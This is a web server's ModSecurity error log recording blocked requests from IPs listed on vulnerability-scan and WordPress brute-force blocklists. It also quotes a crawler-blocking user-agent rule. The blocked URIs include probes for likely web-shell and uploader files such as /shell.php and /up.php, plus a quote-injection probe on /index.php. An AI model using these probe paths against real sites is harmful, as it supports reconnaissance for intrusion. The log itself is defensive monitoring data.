[Tue May 26 18:21:49.456847 2026] [security2:error] [pid 983082:tid 983283] [client 23.100.97.57:9492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/shell.php"] [unique_id "ahWXZbvhpIlZJOtze4tMmwAAAMw"]
[Tue May 26 18:21:50.028997 2026] [security2:error] [pid 983082:tid 983311] [client 23.100.97.57:9646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/setup-config.php"] [unique_id "ahWXZrvhpIlZJOtze4tMsQAAAOg"]
[Tue May 26 18:21:50.178192 2026] [security2:error] [pid 983082:tid 983142] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMtAAAozs"]
[Tue May 26 18:21:50.178669 2026] [security2:error] [pid 983082:tid 983142] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMugAAyDs"]
[Tue May 26 18:21:50.178965 2026] [security2:error] [pid 983082:tid 983144] [remote 146.19.215.203:59185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMuwAAiz0"]
[Tue May 26 18:21:50.179028 2026] [security2:error] [pid 983082:tid 983197] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMvQAAyHI"]
[Tue May 26 18:21:50.179084 2026] [security2:error] [pid 983082:tid 983142] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMwAAAjTs"]
[Tue May 26 18:21:50.179082 2026] [security2:error] [pid 983082:tid 983154] [remote 146.19.215.203:59185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMuQAAi0c"]
[Tue May 26 18:21:50.179130 2026] [security2:error] [pid 983082:tid 983152] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMvgAAjUU"]
[Tue May 26 18:21:50.179213 2026] [security2:error] [pid 983082:tid 983177] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMtQAAjV4"]
[Tue May 26 18:21:50.179294 2026] [security2:error] [pid 983082:tid 983148] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMtgAAo0E"]
[Tue May 26 18:21:50.179582 2026] [security2:error] [pid 983082:tid 983142] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMwgAAjTs"]
[Tue May 26 18:21:50.179615 2026] [security2:error] [pid 983082:tid 983144] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMwQAAjT0"]
[Tue May 26 18:21:50.179648 2026] [security2:error] [pid 983082:tid 983199] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMwwAAjXQ"]
[Tue May 26 18:21:50.179693 2026] [security2:error] [pid 983082:tid 983146] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMuAAAjT8"]
[Tue May 26 18:21:50.179715 2026] [security2:error] [pid 983082:tid 983134] [remote 146.19.215.203:59185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMxQAAizM"]
[Tue May 26 18:21:50.179758 2026] [security2:error] [pid 983082:tid 983143] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php%27"] [unique_id "ahWXZrvhpIlZJOtze4tMvwAAyDw"]
[Tue May 26 18:21:50.179813 2026] [security2:error] [pid 983082:tid 983147] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMvAAAjUA"]
[Tue May 26 18:21:50.180007 2026] [security2:error] [pid 983082:tid 983172] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMxAAAjVk"], referer: '
[Tue May 26 18:21:50.180407 2026] [security2:error] [pid 983082:tid 983145] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMxgAAyD4"]
[Tue May 26 18:21:50.181341 2026] [security2:error] [pid 983082:tid 983168] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMxwAAyFU"]
[Tue May 26 18:21:50.181433 2026] [security2:error] [pid 983082:tid 983151] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMyQAAyEQ"]
[Tue May 26 18:21:50.181487 2026] [security2:error] [pid 983082:tid 983153] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMygAAyEY"]
[Tue May 26 18:21:50.181522 2026] [security2:error] [pid 983082:tid 983179] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMywAAyGA"]
[Tue May 26 18:21:50.182125 2026] [security2:error] [pid 983082:tid 983173] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tMyAAAyFo"]
[Tue May 26 18:21:50.313726 2026] [security2:error] [pid 983082:tid 983338] [client 114.119.144.7:55213] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/project/city-gamer/"] [unique_id "ahWXZrvhpIlZJOtze4tMzgAAAQM"], referer: https://www.jhonweb.com/project_category/web-corporativa
[Tue May 26 18:21:50.340195 2026] [security2:error] [pid 983082:tid 983169] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM0AAA61Y"]
[Tue May 26 18:21:50.340413 2026] [security2:error] [pid 983082:tid 983162] [remote 146.19.215.203:59185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM0QAA1U8"]
[Tue May 26 18:21:50.340461 2026] [security2:error] [pid 983082:tid 983163] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM0gAA0FA"]
[Tue May 26 18:21:50.340464 2026] [security2:error] [pid 983082:tid 983165] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM0wAA0FI"]
[Tue May 26 18:21:50.340980 2026] [security2:error] [pid 983082:tid 983209] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM1gAA9H4"]
[Tue May 26 18:21:50.341124 2026] [security2:error] [pid 983082:tid 983122] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM1QAA0Cc"]
[Tue May 26 18:21:50.341263 2026] [security2:error] [pid 983082:tid 983156] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM1wAA9Ek"]
[Tue May 26 18:21:50.341454 2026] [security2:error] [pid 983082:tid 983167] [remote 146.19.215.203:59185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM2AAAj1Q"]
[Tue May 26 18:21:50.341765 2026] [security2:error] [pid 983082:tid 983176] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM2QAA0F0"]
[Tue May 26 18:21:50.342575 2026] [security2:error] [pid 983082:tid 983157] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM2gAA0Eo"]
[Tue May 26 18:21:50.503869 2026] [security2:error] [pid 983082:tid 983175] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM3QAA3lw"]
[Tue May 26 18:21:50.644724 2026] [security2:error] [pid 983082:tid 983212] [client 23.100.97.57:5240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/t.php"] [unique_id "ahWXZrvhpIlZJOtze4tM4gAAAIU"]
[Tue May 26 18:21:50.665182 2026] [security2:error] [pid 983082:tid 983183] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM4wAA7GQ"]
[Tue May 26 18:21:50.826719 2026] [security2:error] [pid 983082:tid 983205] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM6QAA_Ho"]
[Tue May 26 18:21:50.988311 2026] [security2:error] [pid 983082:tid 983166] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM7wAA_1M"]
[Tue May 26 18:21:51.149241 2026] [security2:error] [pid 983082:tid 983085] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZ7vhpIlZJOtze4tM8QAA6QI"]
[Tue May 26 18:21:51.217477 2026] [security2:error] [pid 983082:tid 983276] [client 23.100.97.57:4982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/up.php"] [unique_id "ahWXZ7vhpIlZJOtze4tM8gAAAMU"]
[Tue May 26 18:21:51.310896 2026] [security2:error] [pid 983082:tid 983203] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZ7vhpIlZJOtze4tM-QAA-ng"]
[Tue May 26 18:21:51.472678 2026] [security2:error] [pid 983082:tid 983207] [remote 146.19.215.203:59185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZ7vhpIlZJOtze4tM_QAAsHw"]
[Tue May 26 18:21:51.634592 2026] [security2:error] [pid 983082:tid 983161] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZ7vhpIlZJOtze4tNAQAApE4"]
[Tue May 26 18:21:51.772052 2026] [security2:error] [pid 983082:tid 983296] [client 23.100.97.57:5256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/ultra.php"] [unique_id "ahWXZ7vhpIlZJOtze4tNBgAAANk"]
[Tue May 26 18:21:51.797556 2026] [security2:error] [pid 983082:tid 983210] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZ7vhpIlZJOtze4tNBwAA-X8"]
[Tue May 26 18:21:51.958847 2026] [security2:error] [pid 983082:tid 983202] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZ7vhpIlZJOtze4tNCwAAuHc"]
[Tue May 26 18:21:52.120594 2026] [security2:error] [pid 983082:tid 983208] [remote 146.19.215.203:59187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXaLvhpIlZJOtze4tNEAAAjX0"]
[Tue May 26 18:21:52.282108 2026] [security2:error] [pid 983082:tid 983198] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXaLvhpIlZJOtze4tNEQAA1XM"]
[Tue May 26 18:21:52.307650 2026] [security2:error] [pid 983082:tid 983274] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXZrvhpIlZJOtze4tM7gAAAMM"]
[Tue May 26 18:21:52.341507 2026] [security2:error] [pid 983082:tid 983324] [client 23.100.97.57:5856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/vv.php"] [unique_id "ahWXaLvhpIlZJOtze4tNFgAAAPU"]
[Tue May 26 18:21:52.685883 2026] [security2:error] [pid 983082:tid 983182] [remote 74.91.224.220:35990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXaLvhpIlZJOtze4tNGAAA02M"]
[Tue May 26 18:21:52.906548 2026] [security2:error] [pid 983082:tid 983284] [client 23.100.97.57:3107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/V5.php"] [unique_id "ahWXaLvhpIlZJOtze4tNIwAAAM0"]
[Tue May 26 18:21:53.493151 2026] [security2:error] [pid 983082:tid 983239] [client 23.100.97.57:6545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/wp-user.php"] [unique_id "ahWXabvhpIlZJOtze4tNNAAAAKA"]
[Tue May 26 18:21:54.058789 2026] [security2:error] [pid 983082:tid 983263] [client 23.100.97.57:1975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/wp-blog.php"] [unique_id "ahWXarvhpIlZJOtze4tNOwAAALg"]
[Tue May 26 18:21:54.173745 2026] [core:error] [pid 983082:tid 983280] [client 155.212.108.224:23679] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:21:54.173762 2026] [core:error] [pid 983082:tid 983280] [client 155.212.108.224:23679] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
